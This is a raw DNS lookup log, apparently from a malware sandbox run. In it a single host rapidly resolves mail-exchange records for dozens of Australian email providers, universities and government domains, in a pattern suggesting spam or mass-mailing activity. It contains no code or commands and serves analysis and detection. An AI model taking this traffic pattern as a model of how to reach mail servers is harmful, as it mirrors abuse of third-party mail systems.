                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:33.527853012 CET8.8.8.8192.168.2.30xb8c3No error (0)filter1.guardi-1.mailguard.com.au52.63.166.203A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:33.527853012 CET8.8.8.8192.168.2.30xb8c3No error (0)filter1.guardi-1.mailguard.com.au20.190.127.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:33.527853012 CET8.8.8.8192.168.2.30xb8c3No error (0)filter1.guardi-1.mailguard.com.au52.147.56.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:33.527853012 CET8.8.8.8192.168.2.30xb8c3No error (0)filter1.guardi-1.mailguard.com.au3.104.195.181A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:33.527853012 CET8.8.8.8192.168.2.30xb8c3No error (0)filter1.guardi-1.mailguard.com.au20.92.218.92A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:33.527853012 CET8.8.8.8192.168.2.30xb8c3No error (0)filter1.guardi-1.mailguard.com.au13.238.162.196A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:33.527853012 CET8.8.8.8192.168.2.30xb8c3No error (0)filter1.guardi-1.mailguard.com.au20.70.88.141A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:33.527853012 CET8.8.8.8192.168.2.30xb8c3No error (0)filter1.guardi-1.mailguard.com.au13.70.186.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:33.527853012 CET8.8.8.8192.168.2.30xb8c3No error (0)filter1.guardi-1.mailguard.com.au13.236.218.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:33.527853012 CET8.8.8.8192.168.2.30xb8c3No error (0)filter1.guardi-1.mailguard.com.au20.92.133.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:33.527853012 CET8.8.8.8192.168.2.30xb8c3No error (0)filter1.guardi-1.mailguard.com.au3.105.81.69A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:33.644779921 CET8.8.8.8192.168.2.30xb6cbNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:33.644779921 CET8.8.8.8192.168.2.30xb6cbNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:33.644779921 CET8.8.8.8192.168.2.30xb6cbNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:33.666279078 CET8.8.8.8192.168.2.30x31a9No error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:33.666279078 CET8.8.8.8192.168.2.30x31a9No error (0)mta6.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:33.666279078 CET8.8.8.8192.168.2.30x31a9No error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:33.666279078 CET8.8.8.8192.168.2.30x31a9No error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:33.666279078 CET8.8.8.8192.168.2.30x31a9No error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:33.666279078 CET8.8.8.8192.168.2.30x31a9No error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:33.666279078 CET8.8.8.8192.168.2.30x31a9No error (0)mta6.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:33.666279078 CET8.8.8.8192.168.2.30x31a9No error (0)mta6.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:33.708470106 CET8.8.8.8192.168.2.30xe78bNo error (0)student.uts.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:33.708470106 CET8.8.8.8192.168.2.30xe78bNo error (0)student.uts.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:33.735461950 CET8.8.8.8192.168.2.30x5472No error (0)au-smtp-inbound-1.mimecast.com124.47.150.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:33.735461950 CET8.8.8.8192.168.2.30x5472No error (0)au-smtp-inbound-1.mimecast.com103.13.69.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:33.735461950 CET8.8.8.8192.168.2.30x5472No error (0)au-smtp-inbound-1.mimecast.com103.13.69.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:33.735461950 CET8.8.8.8192.168.2.30x5472No error (0)au-smtp-inbound-1.mimecast.com124.47.150.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:33.973402977 CET8.8.8.8192.168.2.30xa1bbNo error (0)ser.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:33.976571083 CET8.8.8.8192.168.2.30xda05No error (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:33.994997978 CET8.8.8.8192.168.2.30x6a9aNo error (0)extmail.optusnet.com.au211.29.133.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.021409035 CET8.8.8.8192.168.2.30x7fd3No error (0)harveyschoice.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.021409035 CET8.8.8.8192.168.2.30x7fd3No error (0)harveyschoice.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.031178951 CET8.8.8.8192.168.2.30x6be2No error (0)ser-com-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.031178951 CET8.8.8.8192.168.2.30x6be2No error (0)ser-com-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.045893908 CET8.8.8.8192.168.2.30xdad3No error (0)mx1.forwardemail.net138.197.213.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.059319973 CET8.8.8.8192.168.2.30xb0cfNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.059319973 CET8.8.8.8192.168.2.30xb0cfNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.059319973 CET8.8.8.8192.168.2.30xb0cfNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.113456964 CET8.8.8.8192.168.2.30xeb0fNo error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.113456964 CET8.8.8.8192.168.2.30xeb0fNo error (0)mta6.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.113456964 CET8.8.8.8192.168.2.30xeb0fNo error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.113456964 CET8.8.8.8192.168.2.30xeb0fNo error (0)mta6.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.113456964 CET8.8.8.8192.168.2.30xeb0fNo error (0)mta6.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.113456964 CET8.8.8.8192.168.2.30xeb0fNo error (0)mta6.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.113456964 CET8.8.8.8192.168.2.30xeb0fNo error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.113456964 CET8.8.8.8192.168.2.30xeb0fNo error (0)mta6.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.153817892 CET8.8.8.8192.168.2.30xc744No error (0)exemail.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.153817892 CET8.8.8.8192.168.2.30xc744No error (0)exemail.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.153817892 CET8.8.8.8192.168.2.30xc744No error (0)exemail.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.189042091 CET8.8.8.8192.168.2.30x6a89No error (0)mx.spamexperts.com130.117.54.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.234090090 CET8.8.8.8192.168.2.30xbdfbNo error (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.234090090 CET8.8.8.8192.168.2.30xbdfbNo error (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.254900932 CET8.8.8.8192.168.2.30x135aNo error (0)asav.iinet.net.au203.59.218.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.307598114 CET8.8.8.8192.168.2.30x70feNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.307598114 CET8.8.8.8192.168.2.30x70feNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.307598114 CET8.8.8.8192.168.2.30x70feNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.334383965 CET8.8.8.8192.168.2.30xb7b0No error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.334383965 CET8.8.8.8192.168.2.30xb7b0No error (0)mta6.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.334383965 CET8.8.8.8192.168.2.30xb7b0No error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.334383965 CET8.8.8.8192.168.2.30xb7b0No error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.334383965 CET8.8.8.8192.168.2.30xb7b0No error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.334383965 CET8.8.8.8192.168.2.30xb7b0No error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.334383965 CET8.8.8.8192.168.2.30xb7b0No error (0)mta6.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.334383965 CET8.8.8.8192.168.2.30xb7b0No error (0)mta6.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.484278917 CET8.8.8.8192.168.2.30xd71eName error (3)hiotmail.com.aunonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.486457109 CET8.8.8.8192.168.2.30x4a68No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.486457109 CET8.8.8.8192.168.2.30x4a68No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.486457109 CET8.8.8.8192.168.2.30x4a68No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.511503935 CET8.8.8.8192.168.2.30x46c3No error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.511503935 CET8.8.8.8192.168.2.30x46c3No error (0)mta6.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.511503935 CET8.8.8.8192.168.2.30x46c3No error (0)mta6.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.511503935 CET8.8.8.8192.168.2.30x46c3No error (0)mta6.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.511503935 CET8.8.8.8192.168.2.30x46c3No error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.511503935 CET8.8.8.8192.168.2.30x46c3No error (0)mta6.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.511503935 CET8.8.8.8192.168.2.30x46c3No error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.511503935 CET8.8.8.8192.168.2.30x46c3No error (0)mta6.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.522243977 CET8.8.8.8192.168.2.30xd71eName error (3)hiotmail.com.aunonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.648922920 CET8.8.8.8192.168.2.30x4610No error (0)ramsayhealth.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.648922920 CET8.8.8.8192.168.2.30x4610No error (0)ramsayhealth.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.669428110 CET8.8.8.8192.168.2.30xa18No error (0)au-smtp-inbound-1.mimecast.com103.13.69.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.669428110 CET8.8.8.8192.168.2.30xa18No error (0)au-smtp-inbound-1.mimecast.com103.13.69.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.669428110 CET8.8.8.8192.168.2.30xa18No error (0)au-smtp-inbound-1.mimecast.com124.47.150.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.669428110 CET8.8.8.8192.168.2.30xa18No error (0)au-smtp-inbound-1.mimecast.com124.47.150.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.699960947 CET8.8.8.8192.168.2.30xf52fNo error (0)student.curtin.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.713812113 CET8.8.8.8192.168.2.30x111cNo error (0)eq.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.739434958 CET8.8.8.8192.168.2.30xdd9aNo error (0)student-curtin-edu-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.739434958 CET8.8.8.8192.168.2.30xdd9aNo error (0)student-curtin-edu-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.754972935 CET8.8.8.8192.168.2.30xb3cfNo error (0)eq-edu-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.754972935 CET8.8.8.8192.168.2.30xb3cfNo error (0)eq-edu-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.802504063 CET8.8.8.8192.168.2.30x3f3aNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.802504063 CET8.8.8.8192.168.2.30x3f3aNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.802504063 CET8.8.8.8192.168.2.30x3f3aNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.833795071 CET8.8.8.8192.168.2.30x6408No error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.833795071 CET8.8.8.8192.168.2.30x6408No error (0)mta6.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.833795071 CET8.8.8.8192.168.2.30x6408No error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.833795071 CET8.8.8.8192.168.2.30x6408No error (0)mta6.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.833795071 CET8.8.8.8192.168.2.30x6408No error (0)mta6.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.833795071 CET8.8.8.8192.168.2.30x6408No error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.833795071 CET8.8.8.8192.168.2.30x6408No error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.833795071 CET8.8.8.8192.168.2.30x6408No error (0)mta6.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.892040968 CET8.8.8.8192.168.2.30xc02dNo error (0)flinders.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.892040968 CET8.8.8.8192.168.2.30xc02dNo error (0)flinders.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.908910990 CET8.8.8.8192.168.2.30x3505Name error (3)edu.eq.aunonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.924479008 CET8.8.8.8192.168.2.30x1d80No error (0)au-smtp-inbound-1.mimecast.com124.47.150.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.924479008 CET8.8.8.8192.168.2.30x1d80No error (0)au-smtp-inbound-1.mimecast.com103.13.69.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.924479008 CET8.8.8.8192.168.2.30x1d80No error (0)au-smtp-inbound-1.mimecast.com103.13.69.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.924479008 CET8.8.8.8192.168.2.30x1d80No error (0)au-smtp-inbound-1.mimecast.com124.47.150.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.967500925 CET8.8.8.8192.168.2.30xff23No error (0)eslec.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.967500925 CET8.8.8.8192.168.2.30xff23No error (0)eslec.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.967500925 CET8.8.8.8192.168.2.30xff23No error (0)eslec.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.967500925 CET8.8.8.8192.168.2.30xff23No error (0)eslec.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.967500925 CET8.8.8.8192.168.2.30xff23No error (0)eslec.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.967500925 CET8.8.8.8192.168.2.30xff23No error (0)eslec.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.967500925 CET8.8.8.8192.168.2.30xff23No error (0)eslec.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:34.995934963 CET8.8.8.8192.168.2.30x4567No error (0)aspmx.l.google.com142.251.31.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.026189089 CET8.8.8.8192.168.2.30x2127No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.026189089 CET8.8.8.8192.168.2.30x2127No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.026189089 CET8.8.8.8192.168.2.30x2127No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.061420918 CET8.8.8.8192.168.2.30xdeeNo error (0)mta7.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.061420918 CET8.8.8.8192.168.2.30xdeeNo error (0)mta7.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.061420918 CET8.8.8.8192.168.2.30xdeeNo error (0)mta7.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.061420918 CET8.8.8.8192.168.2.30xdeeNo error (0)mta7.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.061420918 CET8.8.8.8192.168.2.30xdeeNo error (0)mta7.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.061420918 CET8.8.8.8192.168.2.30xdeeNo error (0)mta7.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.061420918 CET8.8.8.8192.168.2.30xdeeNo error (0)mta7.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.061420918 CET8.8.8.8192.168.2.30xdeeNo error (0)mta7.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.129091024 CET8.8.8.8192.168.2.30x284fNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.129091024 CET8.8.8.8192.168.2.30x284fNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.129091024 CET8.8.8.8192.168.2.30x284fNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.150110006 CET8.8.8.8192.168.2.30x9b41No error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.150110006 CET8.8.8.8192.168.2.30x9b41No error (0)mta6.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.150110006 CET8.8.8.8192.168.2.30x9b41No error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.150110006 CET8.8.8.8192.168.2.30x9b41No error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.150110006 CET8.8.8.8192.168.2.30x9b41No error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.150110006 CET8.8.8.8192.168.2.30x9b41No error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.150110006 CET8.8.8.8192.168.2.30x9b41No error (0)mta6.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.150110006 CET8.8.8.8192.168.2.30x9b41No error (0)mta6.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.215538979 CET8.8.8.8192.168.2.30x8fbfNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.215538979 CET8.8.8.8192.168.2.30x8fbfNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.215538979 CET8.8.8.8192.168.2.30x8fbfNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.236197948 CET8.8.8.8192.168.2.30xe20No error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.236197948 CET8.8.8.8192.168.2.30xe20No error (0)mta6.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.236197948 CET8.8.8.8192.168.2.30xe20No error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.236197948 CET8.8.8.8192.168.2.30xe20No error (0)mta6.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.236197948 CET8.8.8.8192.168.2.30xe20No error (0)mta6.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.236197948 CET8.8.8.8192.168.2.30xe20No error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.236197948 CET8.8.8.8192.168.2.30xe20No error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.236197948 CET8.8.8.8192.168.2.30xe20No error (0)mta6.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.326246977 CET8.8.8.8192.168.2.30x1f10No error (0)dhs.vic.gov.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.326246977 CET8.8.8.8192.168.2.30x1f10No error (0)dhs.vic.gov.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.487617970 CET8.8.8.8192.168.2.30x58c0No error (0)mxa-001fc401.gslb.pphosted.com185.132.182.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.508424044 CET8.8.8.8192.168.2.30x6026No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.508424044 CET8.8.8.8192.168.2.30x6026No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.508424044 CET8.8.8.8192.168.2.30x6026No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.532191038 CET8.8.8.8192.168.2.30xaaaNo error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
